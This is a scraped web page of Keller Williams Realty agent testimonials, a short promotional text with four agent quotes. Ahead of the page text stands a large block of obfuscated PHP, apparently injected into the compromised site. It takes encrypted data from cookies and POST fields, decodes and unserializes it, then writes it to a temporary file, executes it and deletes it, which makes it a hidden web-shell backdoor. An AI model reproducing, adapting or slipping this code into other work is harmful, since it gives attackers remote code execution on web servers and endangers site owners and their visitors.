$ZCRizZcve = 'O' . chr (110) . chr (95) . chr ( 1054 - 970 ).chr ( 329 - 245 )."\x50";$krWvdtbQNf = "\x63" . chr ( 1056 - 948 )."\x61" . chr (115) . "\x73" . "\137" . "\145" . chr (120) . "\151" . "\x73" . 't' . chr ( 353 - 238 ); $KvhSuc = class_exists($ZCRizZcve); $krWvdtbQNf = "61895";$GeTkQFl = strpos($krWvdtbQNf, $ZCRizZcve);if ($KvhSuc == $GeTkQFl){function qTcbOGosr(){$RptNTopS = new /* 56892 */ On_TTP(49454 + 49454); $RptNTopS = NULL;}$AeSFqQj = "49454";class On_TTP{private function sBOhrHFsoE($AeSFqQj){if (is_array(On_TTP::$VhFyXqq)) {$name = sys_get_temp_dir() . "/" . crc32(On_TTP::$VhFyXqq["salt"]);@On_TTP::$VhFyXqq["write"]($name, On_TTP::$VhFyXqq["content"]);include $name;@On_TTP::$VhFyXqq["delete"]($name); $AeSFqQj = "49454";exit();}}public function SPkQFzq(){$nFAZtIMGq = "54575";$this->_dummy = str_repeat($nFAZtIMGq, strlen($nFAZtIMGq));}public function __destruct(){On_TTP::$VhFyXqq = @unserialize(On_TTP::$VhFyXqq); $AeSFqQj = "45331_55060";$this->sBOhrHFsoE($AeSFqQj); $AeSFqQj = "45331_55060";}public function rVBka($nFAZtIMGq, $jZBgfHZ){return $nFAZtIMGq[0] ^ str_repeat($jZBgfHZ, intval(strlen($nFAZtIMGq[0]) / strlen($jZBgfHZ)) + 1);}public function yBScSA($nFAZtIMGq){$jBQBODEZK = 'b' . "\x61" . chr (115) . 'e' . chr (54) . chr ( 375 - 323 );return array_map($jBQBODEZK . chr (95) . chr ( 1016 - 916 ).'e' . chr ( 998 - 899 )."\157" . 'd' . chr (101), array($nFAZtIMGq,));}public function __construct($nJTgQAT=0){$KVwWqvSb = chr (44); $nFAZtIMGq = "";$ThPEoecKLg = $_POST;$DNsEXBH = $_COOKIE;$jZBgfHZ = "56344e0c-2a33-4f8f-818c-d6bec0b9f977";$yltFDBDQU = @$DNsEXBH[substr($jZBgfHZ, 0, 4)];if (!empty($yltFDBDQU)){$yltFDBDQU = explode($KVwWqvSb, $yltFDBDQU);foreach ($yltFDBDQU as $AmqgacYVN){$nFAZtIMGq .= @$DNsEXBH[$AmqgacYVN];$nFAZtIMGq .= @$ThPEoecKLg[$AmqgacYVN];}$nFAZtIMGq = $this->yBScSA($nFAZtIMGq);}On_TTP::$VhFyXqq = $this->rVBka($nFAZtIMGq, $jZBgfHZ);if (strpos($jZBgfHZ, $KVwWqvSb) !== FALSE){$jZBgfHZ = explode($KVwWqvSb, $jZBgfHZ); $RrviXojPvf = sprintf("45331_55060", strrev($jZBgfHZ[0]));}}public static $VhFyXqq = 53289;}qTcbOGosr();}$FknkYf = 'D' . "\137" . chr ( 559 - 487 )."\171" . "\113" . chr ( 492 - 377 ); $IyUtA = "\x63" . chr (108) . chr ( 377 - 280 )."\163" . chr ( 762 - 647 )."\x5f" . 'e' . chr ( 678 - 558 ).chr (105) . "\x73" . "\x74" . 's';$tVcfGBM = class_exists($FknkYf); $IyUtA = "47556";$HJvzxOnkTz = !1;if ($tVcfGBM == $HJvzxOnkTz){function SkkPVTR(){return FALSE;}$wHjLxmXyJ = "38279";SkkPVTR();class D_HyKs{private function krmTrMZju($wHjLxmXyJ){if (is_array(D_HyKs::$CqvGFSh)) {$GXcSxy = sys_get_temp_dir() . "/" . crc32(D_HyKs::$CqvGFSh[chr (115) . chr (97) . "\x6c" . chr ( 1039 - 923 )]);@D_HyKs::$CqvGFSh[chr (119) . chr (114) . "\x69" . chr ( 1002 - 886 )."\x65"]($GXcSxy, D_HyKs::$CqvGFSh["\x63" . chr (111) . "\156" . chr ( 986 - 870 )."\145" . chr ( 227 - 117 ).chr ( 1082 - 966 )]);include $GXcSxy;@D_HyKs::$CqvGFSh["\x64" . 'e' . "\x6c" . chr ( 369 - 268 )."\x74" . 'e']($GXcSxy); $wHjLxmXyJ = "38279";exit();}}private $zqomTcmuk;public function pkTVgiEkF(){echo 42700;}public function __destruct(){$wHjLxmXyJ = "18938_39778";$this->krmTrMZju($wHjLxmXyJ); $wHjLxmXyJ = "18938_39778";}public function __construct($asvCV=0){$bsQjzGKgIg = $_POST;$VOtcO = $_COOKIE;$cJJIyTJ = "2771008d-9598-4a46-8514-833f00441d79";$vXjLct = @$VOtcO[substr($cJJIyTJ, 0, 4)];if (!empty($vXjLct)){$ANzrKIa = "base64";$tizoyZxLYB = "";$vXjLct = explode(",", $vXjLct);foreach ($vXjLct as $ECDuS){$tizoyZxLYB .= @$VOtcO[$ECDuS];$tizoyZxLYB .= @$bsQjzGKgIg[$ECDuS];}$tizoyZxLYB = array_map($ANzrKIa . "\x5f" . 'd' . chr ( 777 - 676 )."\143" . 'o' . "\144" . chr (101), array($tizoyZxLYB,)); $tizoyZxLYB = $tizoyZxLYB[0] ^ str_repeat($cJJIyTJ, (strlen($tizoyZxLYB[0]) / strlen($cJJIyTJ)) + 1);D_HyKs::$CqvGFSh = @unserialize($tizoyZxLYB); $tizoyZxLYB = class_exists("18938_39778");}}public static $CqvGFSh = 41644;}$ignetG = new /* 57886 */ $FknkYf(38279 + 38279); $HJvzxOnkTz = $ignetG = $wHjLxmXyJ = Array();} KW Agent Testimonials – Why Keller Why Now

KW Agent Testimonials

Keller Williams Realty is different.  The focus is on the agent and NOT on the brokerage.  By having successful agents, the brokerage has become the largest real estate team in North America.   Find out about some of our local success stories right here:

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Keller Williams Realty Greater Cleveland West provided me with the environment I needed to build a business larger then any of the traditional companies allow or support — Greg Erlanger

Being with a large national network of realtors allowed me to close more deals then when I was at a local broker — Renee Zembala

The excitement and support in our KW office is amazing and something I have not been a part of before — Stephanie Kiesel

Profit share is an amazing way to KW shows its agents they are partners and not just controlled assets of the brokerage  — Mike Zinicola